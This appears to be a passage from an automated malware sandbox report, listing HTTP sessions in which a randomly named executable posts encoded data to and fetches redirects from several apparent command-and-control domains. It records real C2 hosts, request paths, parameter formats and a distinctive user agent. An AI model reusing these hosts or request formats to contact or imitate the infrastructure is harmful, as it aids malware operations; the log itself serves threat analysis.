                                                                                                        Data Ascii: aNXP_jw=mME0ZX0cZGtukgd8xhXdQ0LaYM6/P1K8s+gW4ZkESBHXVzBLdpFrcEZzpxbXIxon41WHted49kxceahxG0bjXgAu3+SCD8/scVpt92HCfiQ6az0SweJOqF7aXrA2Kef/tgEIfUfHXsIIbJBSG1iIszV9lgYKbtEs7rwQ3a4n+6kJAMPFJvLu83LqL6xFqkEDPoj4aRH4QshqAuvDI9ASNEZ1qdUJ8R4CXv58OFXLMHlCd6lANojBOIilj2Vk/iqJIIzKXLOhx/7nHHszMV0qUCP5sA7vd80/RyC3pRHz/gZ4VLvEJrH5h6jlpVmQP5gTpCAs5mOouuKhsv/WUi1NIboD04da64gj+3IpvO8Qeds5090umHyCwjpHBuVUeG10layCK1wJQshx2p30eFEwDxT3VgMm1clvYhbsLXPXGD5AFw1aKRdfcSS78M9vwZjMuPKcfu8v6rHtBu77lT9EmIu3flc3vdfsysbHiI5BtpWGLJbez+hbPI1doPVukH7krQ53agBL1BSvYjzI8CxjQjyATLMUvLYclcnnfwZWc9CevH9YQEG3KFan1HjDEgtgAN3KofUnaR4EuhCp7j0+PegSwsCte6pcxClQwt+Gyo0EMfGwtFaWKBPm1JQHHDdckh1QS7hUJgpeCMrWcrPsEU4IpbvhZf3qlmuVX6Gltxd0yCpJdA8pyqWoTfJudoRShub0LH6xBQIrDbMOHIWaiY0bLl2Y3y58MZqXuaqNFBhIrY18F4E1y0JQpITS8EaQmyvJ9vrKQs6kWmMhtgtftr1kKqey2YXhVAtsY8Au7IFnJ4pqCOqOW7mbAK1VXVyDVRjmcE39dI0m3bKyAed0hbzmBQCqpp0F5jgTOvUCHrfXbyy5TTQ9sU8VWfgT//6WWGdKZazGLfRTUcJDBfiMXzxQwhtrOoxj1By7AvWzzA+Z+hY5+g7nF2HbP5szl2q5M4hApjtXXo01ZXEdO7K03n7OkqjlB8v0+kOyCmC1kQ8G [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        24192.168.2.6500143.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:39:11.615056992 CET547OUTGET /5l50/?aNXP_jw=rOsUan8VbFhNvxYE9hHVSSa/SbzRVnORxP9GyZA7SRPLTVt8SKFFaQAsgVzmVwIzjQiAicxO7WRfOIhRPBniTm4i15yEbcTUEwFf3HznLV4DES1syv5vrWOVY80sCIfmhGQOLBk=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.it2sp8.vip
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:39:12.751909971 CET414INHTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Mon, 02 Dec 2024 13:39:12 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 274
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 61 4e 58 50 5f 6a 77 3d 72 4f 73 55 61 6e 38 56 62 46 68 4e 76 78 59 45 39 68 48 56 53 53 61 2f 53 62 7a 52 56 6e 4f 52 78 50 39 47 79 5a 41 37 53 52 50 4c 54 56 74 38 53 4b 46 46 61 51 41 73 67 56 7a 6d 56 77 49 7a 6a 51 69 41 69 63 78 4f 37 57 52 66 4f 49 68 52 50 42 6e 69 54 6d 34 69 31 35 79 45 62 63 54 55 45 77 46 66 33 48 7a 6e 4c 56 34 44 45 53 31 73 79 76 35 76 72 57 4f 56 59 38 30 73 43 49 66 6d 68 47 51 4f 4c 42 6b 3d 26 63 54 54 38 75 3d 51 34 4e 48 6f 48 4a 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?aNXP_jw=rOsUan8VbFhNvxYE9hHVSSa/SbzRVnORxP9GyZA7SRPLTVt8SKFFaQAsgVzmVwIzjQiAicxO7WRfOIhRPBniTm4i15yEbcTUEwFf3HznLV4DES1syv5vrWOVY80sCIfmhGQOLBk=&cTT8u=Q4NHoHJ0"}</script></head></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        25192.168.2.6500153.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:39:18.561003923 CET819OUTPOST /cvmn/ HTTP/1.1
                                                                                                        Host: www.cbprecise.online
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.cbprecise.online
                                                                                                        Referer: http://www.cbprecise.online/cvmn/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 70 52 65 76 57 6f 75 34 46 6a 71 6d 4c 49 79 41 44 57 79 43 58 6f 75 2f 36 31 52 72 65 35 63 2b 6d 2b 2f 6d 62 63 4e 66 2f 58 32 47 41 64 75 72 75 4c 4f 56 69 71 55 70 44 30 34 49 55 51 75 52 4d 38 70 76 56 6b 62 38 69 34 6a 48 59 47 76 76 2f 58 71 64 38 63 57 37 55 64 51 71 52 67 76 34 4e 4b 2b 4d 51 30 4f 67 62 68 45 5a 47 2b 52 71 65 41 74 65 34 5a 53 78 30 67 58 55 77 36 72 4f 67 4b 44 68 39 30 6f 35 55 2f 71 70 53 78 79 36 62 36 6b 57 6b 76 75 70 4e 70 44 49 71 59 51 50 58 36 41 33 43 61 4e 57 6b 39 41 78 6f 70 43 38 6c 32 6d 4c 66 59 34 4a 67 6d 46 2b 30 2f 7a 57 4d 73 74 74 46 37 64 54 45 55 61 36
                                                                                                        Data Ascii: aNXP_jw=pRevWou4FjqmLIyADWyCXou/61Rre5c+m+/mbcNf/X2GAduruLOViqUpD04IUQuRM8pvVkb8i4jHYGvv/Xqd8cW7UdQqRgv4NK+MQ0OgbhEZG+RqeAte4ZSx0gXUw6rOgKDh90o5U/qpSxy6b6kWkvupNpDIqYQPX6A3CaNWk9AxopC8l2mLfY4JgmF+0/zWMsttF7dTEUa6


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        26192.168.2.6500173.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:39:21.231775045 CET843OUTPOST /cvmn/ HTTP/1.1
                                                                                                        Host: www.cbprecise.online
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.cbprecise.online
                                                                                                        Referer: http://www.cbprecise.online/cvmn/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 70 52 65 76 57 6f 75 34 46 6a 71 6d 49 6f 69 41 43 78 6d 43 52 49 75 2b 2b 46 52 72 55 5a 63 36 6d 2b 7a 6d 62 5a 31 50 2b 6c 53 47 42 2f 32 72 76 4f 69 56 6a 71 55 70 57 45 34 48 62 77 75 4f 4d 38 6c 4e 56 6b 58 38 69 34 6e 48 59 48 66 76 2f 6b 79 61 75 38 57 39 62 39 51 73 4f 77 76 34 4e 4b 2b 4d 51 30 71 5a 62 68 63 5a 47 50 68 71 4d 78 74 66 37 5a 53 32 2b 41 58 55 37 61 72 4b 67 4b 43 32 39 31 30 66 55 38 65 70 53 7a 61 36 56 50 51 56 39 66 75 76 4a 70 43 6e 73 61 64 77 5a 62 78 64 46 35 77 77 36 61 49 4a 67 2f 66 6d 35 46 6d 6f 4e 49 59 4c 67 6b 64 4d 30 66 7a 38 4f 73 56 74 58 73 52 30 4c 67 2f 5a 31 69 6a 67 48 53 37 79 66 53 75 49 47 62 63 75 69 2b 78 35 34 67 3d 3d
                                                                                                        Data Ascii: aNXP_jw=pRevWou4FjqmIoiACxmCRIu++FRrUZc6m+zmbZ1P+lSGB/2rvOiVjqUpWE4HbwuOM8lNVkX8i4nHYHfv/kyau8W9b9QsOwv4NK+MQ0qZbhcZGPhqMxtf7ZS2+AXU7arKgKC2910fU8epSza6VPQV9fuvJpCnsadwZbxdF5ww6aIJg/fm5FmoNIYLgkdM0fz8OsVtXsR0Lg/Z1ijgHS7yfSuIGbcui+x54g==


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        27192.168.2.6500183.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:39:23.902400970 CET1856OUTPOST /cvmn/ HTTP/1.1
                                                                                                        Host: www.cbprecise.online
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.cbprecise.online
                                                                                                        Referer: http://www.cbprecise.online/cvmn/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 70 52 65 76 57 6f 75 34 46 6a 71 6d 49 6f 69 41 43 78 6d 43 52 49 75 2b 2b 46 52 72 55 5a 63 36 6d 2b 7a 6d 62 5a 31 50 2b 6c 61 47 42 4b 69 72 76 74 36 56 67 71 55 70 58 45 34 54 62 77 76 55 4d 2f 56 4a 56 6b 71 42 69 37 50 48 58 46 6e 76 35 56 79 61 6b 38 57 39 51 64 51 74 52 67 76 49 4e 4b 76 48 51 30 36 5a 62 68 63 5a 47 4e 35 71 50 67 74 66 39 5a 53 78 30 67 58 6d 77 36 72 79 67 4b 4b 6d 39 31 77 50 55 4b 75 70 53 54 71 36 59 5a 38 56 69 76 75 74 46 4a 43 2f 73 61 52 52 5a 62 74 47 46 34 46 62 36 64 34 4a 77 71 43 4a 38 32 4f 6b 59 71 59 6b 78 33 39 63 73 61 4f 4d 49 71 4e 65 52 74 4e 43 42 78 50 37 32 79 37 55 48 79 62 77 63 45 4b 65 47 66 4e 4b 75 63 67 4a 69 68 6e 47 46 44 74 6b 56 53 5a 70 31 33 7a 68 36 4e 2f 39 74 64 6d 6b 43 37 77 34 54 33 73 68 6c 4e 44 49 4c 67 4f 6e 2f 45 56 5a 74 74 34 71 63 7a 71 42 76 61 6b 74 41 56 30 32 6a 6a 78 6a 52 6f 30 77 4d 41 54 4f 69 4c 33 6b 77 38 56 64 57 34 39 31 7a 68 72 65 46 4c 37 4b 69 47 71 46 64 5a 4c 54 78 68 2f 52 66 50 [TRUNCATED]
                                                                                                        Data Ascii: aNXP_jw=pRevWou4FjqmIoiACxmCRIu++FRrUZc6m+zmbZ1P+laGBKirvt6VgqUpXE4TbwvUM/VJVkqBi7PHXFnv5Vyak8W9QdQtRgvINKvHQ06ZbhcZGN5qPgtf9ZSx0gXmw6rygKKm91wPUKupSTq6YZ8VivutFJC/saRRZbtGF4Fb6d4JwqCJ82OkYqYkx39csaOMIqNeRtNCBxP72y7UHybwcEKeGfNKucgJihnGFDtkVSZp13zh6N/9tdmkC7w4T3shlNDILgOn/EVZtt4qczqBvaktAV02jjxjRo0wMATOiL3kw8VdW491zhreFL7KiGqFdZLTxh/RfPZ3ruBxjV2IwlQfi/0tdYTW3vGGqj0iZEQYSpQUNwMh3tXOJVbsvcMYz5t63DyIEzWnkeFAD41r0xG2aSJBwSODjlu+jnV6QVDkKf0erDcfVNrZBGqSdnGPdY9kvBHtzwE6uzZFHZcnnQFzdkVWK6jiTI/SXRbGFFWXCEYcreYOEnDgthKhq8tpnx4FavAVdu1RXaURwzttRUMs/kHZv6JOU+YZj7HHRDjD8sdLQOHytx/2qzkgFuaeesYa7BbnBrDX+igTXolT3wgp2R+1OoIL32D8gOf9B1f2NwWFWsYJjr8DXu8Ob8bnWlmpVqm0D+XeLo8Jmis5TdExNUDh/LcbNRlsreQnfbu0nT5i8uEBYg5hwtTzIreqHGlhC+JoA2tG8/XLarkLBqtotlXtXTONA+dCCcy5tABlLHv4+oRVCL+Tau9DsrnYv4nqcacXknGqO86Pwd4eSMj+UtscaPBF3yc4CpYmod9DF98O8P2r2ZiBeTrojppCH2MzAFz0Meu2XJVta+ipnVwNCq687gdxjVsN6OuSmPWwsXvsEMW2OZnPb3YjHwpQE3jVzKrX5lmZEyh96Yu3PJSxZ+JEzz46uhVuDibdULvNXu2JMyc4EvInmB5CcOmzQEwphbZDfbMaKL6KLQftgQcHWx0zxXUPy4kIhrHbMkfj [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        28192.168.2.6500193.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:39:26.573471069 CET553OUTGET /cvmn/?cTT8u=Q4NHoHJ0&aNXP_jw=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+roKiKfYRZRlDdOZb7PAuefTsxfeJpJgY665Liw0ad36KrhrX4mzY= HTTP/1.1
                                                                                                        Host: www.cbprecise.online
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:39:27.662194014 CET414INHTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Mon, 02 Dec 2024 13:39:27 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 274
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 63 54 54 38 75 3d 51 34 4e 48 6f 48 4a 30 26 61 4e 58 50 5f 6a 77 3d 6b 54 32 50 56 63 75 59 50 68 43 49 63 59 65 32 4c 33 79 68 53 5a 6d 2f 30 31 4e 32 59 61 45 70 37 4d 69 36 52 62 78 59 39 58 75 52 5a 71 33 6a 6e 74 58 6e 6e 39 68 30 54 7a 39 64 55 44 36 52 55 35 39 55 64 31 7a 6c 75 4b 4f 30 64 56 7a 70 2b 53 2b 72 6f 4b 69 4b 66 59 52 5a 52 6c 44 64 4f 5a 62 37 50 41 75 65 66 54 73 78 66 65 4a 70 4a 67 59 36 36 35 4c 69 77 30 61 64 33 36 4b 72 68 72 58 34 6d 7a 59 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?cTT8u=Q4NHoHJ0&aNXP_jw=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+roKiKfYRZRlDdOZb7PAuefTsxfeJpJgY665Liw0ad36KrhrX4mzY="}</script></head></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        29192.168.2.65002047.238.157.253802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:39:34.032985926 CET804OUTPOST /tjfd/ HTTP/1.1
                                                                                                        Host: www.yun08ps.top
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.yun08ps.top
                                                                                                        Referer: http://www.yun08ps.top/tjfd/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 73 57 64 63 61 50 66 7a 65 76 2f 74 69 7a 34 46 55 2f 42 7a 35 63 77 30 54 33 38 37 33 65 67 31 2b 63 39 6e 2f 70 2b 52 32 6d 57 48 65 61 53 61 64 6e 39 45 50 62 32 4c 65 59 63 38 58 2f 65 6f 4b 78 6b 49 4a 36 78 2f 64 4e 37 41 53 53 51 6f 53 67 31 6c 6f 33 67 65 69 45 4a 55 7a 4d 4b 57 6e 45 44 5a 61 61 79 68 70 56 4b 67 6b 54 4c 65 37 56 66 6e 48 74 35 49 67 6f 49 39 4d 53 65 7a 77 71 79 53 63 77 66 2f 56 62 66 49 6c 7a 6f 64 6e 74 67 62 58 34 79 57 6a 4b 2f 5a 4f 54 31 6b 70 4e 43 49 47 35 32 78 43 61 42 41 36 36 6a 64 79 38 69 43 37 71 47 4d 74 73 50 31 56 47 41 4c 66 63 48 48 79 47 74 6b 53 59 77 39
                                                                                                        Data Ascii: aNXP_jw=sWdcaPfzev/tiz4FU/Bz5cw0T3873eg1+c9n/p+R2mWHeaSadn9EPb2LeYc8X/eoKxkIJ6x/dN7ASSQoSg1lo3geiEJUzMKWnEDZaayhpVKgkTLe7VfnHt5IgoI9MSezwqyScwf/VbfIlzodntgbX4yWjK/ZOT1kpNCIG52xCaBA66jdy8iC7qGMtsP1VGALfcHHyGtkSYw9


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        30192.168.2.65002147.238.157.253802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:39:36.699934006 CET828OUTPOST /tjfd/ HTTP/1.1
                                                                                                        Host: www.yun08ps.top
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.yun08ps.top
                                                                                                        Referer: http://www.yun08ps.top/tjfd/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 73 57 64 63 61 50 66 7a 65 76 2f 74 74 77 67 46 57 59 39 7a 2b 38 77 33 50 48 38 37 68 75 67 35 2b 63 35 6e 2f 6f 71 42 33 51 6d 48 66 36 43 61 48 6c 5a 45 4f 62 32 4c 55 34 64 30 4b 50 65 5a 4b 78 34 66 4a 37 64 2f 64 4e 48 41 53 57 63 6f 52 52 31 6d 75 6e 67 63 33 55 4a 53 75 38 4b 57 6e 45 44 5a 61 61 32 62 70 56 79 67 6c 6a 37 65 30 55 66 67 4e 4e 35 4a 77 34 49 39 62 43 66 36 77 71 7a 78 63 31 2f 56 56 59 33 49 6c 33 73 64 6e 34 63 59 41 49 79 51 74 71 2f 4d 48 67 77 2b 6f 75 72 4e 5a 62 69 57 5a 6f 4e 54 32 73 2b 48 75 50 69 68 70 36 6d 4f 74 75 58 48 56 6d 41 68 64 63 2f 48 67 52 68 44 64 73 56 65 68 6b 61 61 46 2b 57 55 44 57 6b 70 67 68 75 37 36 75 59 4e 41 51 3d 3d
                                                                                                        Data Ascii: aNXP_jw=sWdcaPfzev/ttwgFWY9z+8w3PH87hug5+c5n/oqB3QmHf6CaHlZEOb2LU4d0KPeZKx4fJ7d/dNHASWcoRR1mungc3UJSu8KWnEDZaa2bpVyglj7e0UfgNN5Jw4I9bCf6wqzxc1/VVY3Il3sdn4cYAIyQtq/MHgw+ourNZbiWZoNT2s+HuPihp6mOtuXHVmAhdc/HgRhDdsVehkaaF+WUDWkpghu76uYNAQ==


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        31192.168.2.65002247.238.157.253802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:39:39.370096922 CET1841OUTPOST /tjfd/ HTTP/1.1
                                                                                                        Host: www.yun08ps.top
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.yun08ps.top
                                                                                                        Referer: http://www.yun08ps.top/tjfd/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 73 57 64 63 61 50 66 7a 65 76 2f 74 74 77 67 46 57 59 39 7a 2b 38 77 33 50 48 38 37 68 75 67 35 2b 63 35 6e 2f 6f 71 42 33 54 47 48 65 4a 61 61 64 46 6c 45 4e 62 32 4c 53 49 64 33 4b 50 65 2b 4b 78 78 33 4a 37 42 4a 64 49 4c 41 54 7a 41 6f 61 44 64 6d 67 6e 67 63 76 6b 4a 58 7a 4d 4b 44 6e 46 79 65 61 61 6d 62 70 56 79 67 6c 68 54 65 39 6c 66 67 65 64 35 49 67 6f 49 68 4d 53 66 57 77 70 43 4b 63 31 7a 76 4a 35 58 49 6b 58 38 64 67 4f 49 59 43 6f 79 53 67 4b 2b 4a 48 6e 35 67 6f 76 48 72 5a 61 6d 6f 5a 6f 35 54 30 4c 62 71 37 2f 36 68 34 72 6d 4e 2b 70 58 45 55 79 41 57 46 65 50 36 76 48 39 4b 62 65 42 65 6f 68 33 41 52 35 2f 74 4c 57 63 32 76 33 7a 43 76 4d 78 4b 62 66 6c 45 44 50 66 78 72 75 49 2b 58 4f 50 78 59 39 4d 71 50 50 47 6d 79 67 39 59 4b 4d 4e 46 67 79 6f 56 39 33 78 4b 2b 43 4c 74 41 6c 2f 65 34 4d 4e 63 32 46 64 52 2b 56 36 62 75 73 53 38 2b 32 74 71 31 49 44 36 73 59 4e 63 36 74 57 44 42 54 4b 71 52 72 7a 78 39 50 4e 58 56 32 74 70 39 70 55 6c 45 34 77 72 66 4d [TRUNCATED]
                                                                                                        Data Ascii: aNXP_jw=sWdcaPfzev/ttwgFWY9z+8w3PH87hug5+c5n/oqB3TGHeJaadFlENb2LSId3KPe+Kxx3J7BJdILATzAoaDdmgngcvkJXzMKDnFyeaambpVyglhTe9lfged5IgoIhMSfWwpCKc1zvJ5XIkX8dgOIYCoySgK+JHn5govHrZamoZo5T0Lbq7/6h4rmN+pXEUyAWFeP6vH9KbeBeoh3AR5/tLWc2v3zCvMxKbflEDPfxruI+XOPxY9MqPPGmyg9YKMNFgyoV93xK+CLtAl/e4MNc2FdR+V6busS8+2tq1ID6sYNc6tWDBTKqRrzx9PNXV2tp9pUlE4wrfMumnKtPCXQ+ENkofAf3ZyQ3uBAo/vTeeiD0MsvNkazX+hx6OBDB6eFqRDgU0nrzTJ64Gq9NYNY578c9ycez4zKa3JwZDVZRR0CF2eMEDovhyg8E5ccrzTltk1LYaEdTxlE1sUn7AU+9pPCQaUDdxP5VtFOPq8Z4bXR+e/jVphTYxGr45VC/umhIlpVzUHS/pAyQbIOP5xV2g6mzEsFUKQgW8qfjS0EghF4+q8P3SpKcHrRQO0nNiYVmtY7kKNIZfMfAlHLgyBcBojAPLvo6B/S9XLARpXy63hHwQDmguvTJ09wLyHwPJ66gE7fPExY/7IWUMhxHgtPYEaZ1ddVV3d2BDLBOPd7JXW0olJJbEGcAdgc5rFZ5bko4EhxdRIvaCGa2UejMXFsg+JCxAsZLGTV8RBQnsporRstINEb9M4UuRhCB4LzHmv3Z7+L+/53QfiEBVEG5lUkjIryyAS9gWI9ljwguh7lnTsPkwA9FIPlzjtLnTod8M8s2ubvOHweqpwUqrh3vSo09fn5lXXrhmG4ZLyYUmxtdpkYMDHKB8VyY8zrIhAL66r4Jv04yY9VvgFoDYguucMyeZAvRY0HhoSYc87Hpx1lREq/sgi2AbzqK2tneJth1Az63tZbqApS7RmYH8Mm6/7HAxQ0TNsdXJnw3MoD5lwmuATpg [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        32192.168.2.65002347.238.157.253802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:39:42.045149088 CET548OUTGET /tjfd/?aNXP_jw=hU18Z//aae7PuBg9apJb96loanMP5/1Vub46+YuE1RepJ+epEltxKOfVY+omXPiOW2IODI1uSb7TTTd0R0t6khQdikIhy+mltUDrCuC1oSKa8QDC2XrbIZdN6oN7Umup+JrtMVA=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.yun08ps.top
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
